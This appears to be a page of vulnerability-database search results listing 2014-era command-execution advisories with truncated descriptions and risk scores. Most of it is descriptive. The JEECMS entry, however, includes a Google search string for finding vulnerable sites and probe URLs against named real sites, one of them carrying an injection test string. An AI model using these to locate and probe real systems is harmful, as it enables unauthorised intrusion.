
7631 matches found

Cvelist
added 2014/09/04 5:0 p.m., 18 views

CVE-2014-2972

expand.c in Exim before 4.83 expands mathematical comparisons twice, which allows local users to gain privileges and execute arbitrary commands via a crafted lookup value...

7 AI score, 0.00487 EPSS
Exploits 0, References 8

seebug.org
added 2014/08/14 12:0 a.m., 75 views

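JEECMS Arbitrary Command Execution Vulnerability (Affects a Large Number of Cases, Administrator Privileges)

Brief description: JEECMS arbitrary command execution vulnerability (affects a large number of cases, Administrator privileges). Detailed description: Google search: inurl:jeecms/ArtiSearch.do, affects a large number of cases http://www.wwxzfw.gov.cn/jeecms/ArtiSearch.do?count=10&searchKey=a%27+and+1%3D1&chnlId= http://www.cnfamily.com/family/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1...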

7.1 AI score
Exploits 0

NVD
added 2014/07/28 3:55 p.m., 15 views

CVE-2014-5112

maint/modules/home/index.php in Fonality trixbox allows remote attackers to execute arbitrary commands via shell metacharacters in the lang parameter...

7.5 CVSS, 7.7 AI score, 0.09164 EPSS
Exploits 1, References 1

Tenable Nessus
added 2014/07/21 12:0 a.m., 39 views

HP Data Protector 8.x Arbitrary Command Execution (HPSBMU03072)

Binary data hpdataprotectorhpsbmu03072.nbin...

10 CVSS, 7.3 AI score, 0.89394 EPSS
Exploits 20, References 2

Check Point Advisories
added 2014/07/20 12:0 a.m., 3 views

AlienVault OSSIM av-centerd Util.pm get_license Arbitrary Command Execution (CVE-2014-3805)

An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the getlicense function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending...

10 CVSS, 4 AI score, 0.13072 EPSS
Exploits 7

CVE
added 2014/07/07 2:0 p.m., 81 views

CVE-2014-3486

The CVE-2014-3486 entry affects Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2. A local attacker could exploit a symlink attack on a temporary file with a predictable name via two components: the shell_exec function in lib/util/MiqSshUtilV1.rb and the temp_cmd_file function in lib...

6.9 CVSS, 7.2 AI score, 0.00354 EPSS
Exploits 0, References 3, Affected Software 1

seebug.org
added 2014/07/02 12:0 a.m., 18 views

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC

No description provided by source. source: http://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium ISC. BIND fails to properly bound the data received when processing an inverse...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 11 views

Matt Kruse Calendar Script 2.2 Arbitrary Command Execution

No description provided by source. source: http://www.securityfocus.com/bid/1215/info Matt Kruse's Calendar script is a popular, free Perl CGI script used by many websites on the Internet. It allows a website administrator to easily set up and customize a calendar on their website. There are two...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 15 views

Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16151/info HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input. These vulnerabilities allow an attacker...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 161 views

Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a...

6.7 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 8 views

CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4579/info CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script. Reportedly, configuration values used by the script are...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 20 views

Sendfile 1.x/2.1 Forced Privilege Lowering Failure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2652/info Sendfile is an implementation of the SAFT simple asynchronous file transfer protocol for UNIX systems. A serialization error exists in the Sendfile daemon, sendfiled. When used in conjunction with other problems...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 54 views

D-Link DSR Router Series - Remote Root Shell Exploit

No description provided by source. !/usr/bin/python CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution Vulnerable Routers: D-Link DSR-150 Firmware v1.08B44 D-Link DSR-150N Firmware v1.05B64 D-Link DSR-250 and DSR-250N...

10 CVSS, 9.2 AI score, 0.09549 EPSS
Exploits 8

seebug.org
added 2014/07/01 12:0 a.m., 24 views

CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability

No description provided by source. Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 24 views

3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution

No description provided by source. source: http://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. It is possible for a remote user to gain read access to all files located on the server via the usage of the /.. string passed to a CGI, thereby compromising th...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 14 views

RedHat 6.2/7.0 Tmpwatch Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1785/info A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system library calls. ...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 7 views

Snoopy 0.9x/1.0/1.2 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15213/info Snoopy is prone to a vulnerability that lets attackers execute arbitrary commands because the application fails to properly sanitize user-supplied input. This issue may facilitate unauthorized remote access to...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 40 views

thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection

No description provided by source. source: http://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'minihttpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. Attackers can exploit this issue to execute arbitrary...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 22 views

DD-WRT HTTP Daemon Arbitrary Command Execution

No description provided by source...

7.1 AI score
Exploits 0

seebug.org
added 2014/07/01 12:0 a.m., 16 views

Family Connections less.php Remote Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

7.1 AI score
Exploits 0